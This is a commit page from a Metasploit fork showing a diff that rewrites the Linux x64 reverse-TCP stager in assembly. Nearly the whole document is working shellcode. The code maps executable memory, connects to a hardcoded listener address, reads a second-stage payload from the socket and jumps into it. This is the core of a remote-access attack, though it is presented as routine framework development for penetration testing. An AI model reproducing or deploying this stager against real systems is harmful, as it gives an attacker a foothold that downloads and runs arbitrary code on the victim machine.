adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Land #8771, rewrite linux x64 stagers with Metasm

Browse Source
This commit is contained in:
Brent Cook
2017-08-14 02:32:29 -04:00
parent 0ab6dd46d3 2ec064418f
commit 59086af261
3 changed files with 203 additions and 107 deletions
Download Patch File Download Diff File Expand all files Collapse all files
external/source/shellcode/linux/x64/stager_sock_reverse.s
Vendored
+46 -39
View File
@@ -25,51 +25,58 @@
.text
.globl _start
_start:
xor %rdi,%rdi
pushq $0x9
xor %rdi, %rdi
push $0x9
pop %rax
cltd
mov $0x10,%dh
mov %rdx,%rsi
xor %r9,%r9
pushq $0x22
cdq
mov $0x10, %dh
mov %rdx, %rsi
xor %r9, %r9
push $0x22
pop %r10
mov $0x7,%dl
syscall
test %rax, %rax
js failed
# mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
push %rsi
push %rax
pushq $0x29
pop %rax
cltd
pushq $0x2
pop %rdi
pushq $0x1
pop %rsi
syscall
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
test %rax, %rax
js failed
xchg %rax,%rdi
movabs $0x100007fb3150002,%rcx
push %rcx
mov %rsp,%rsi
pushq $0x10
pop %rdx
pushq $0x2a
pop %rax
syscall
# connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
mov $0x7, %dl
syscall # mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
test %rax, %rax
js failed
push %rsi
push %rax
push $0x29
pop %rax
cdq
push $0x2
pop %rdi
push $0x1
pop %rsi
syscall # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
test %rax, %rax
js failed
xchg %rax, %rdi
movabs $0x100007fb3150002, %rcx
push %rcx
mov %rsp, %rsi
push $0x10
pop %rdx
push $0x2a
pop %rax
syscall # connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
test %rax, %rax
js failed
pop %rcx
pop %rsi
pop %rdx
syscall # read(3, "", 4096)
jmpq *%rsi
test %rax, %rax
js failed
jmpq *%rsi # to stage
failed:
pushq $0x3c
push $0x3c
pop %rax
pushq $0x1
push $0x1
pop %rdi
syscall
# exit(1)
syscall # exit(1)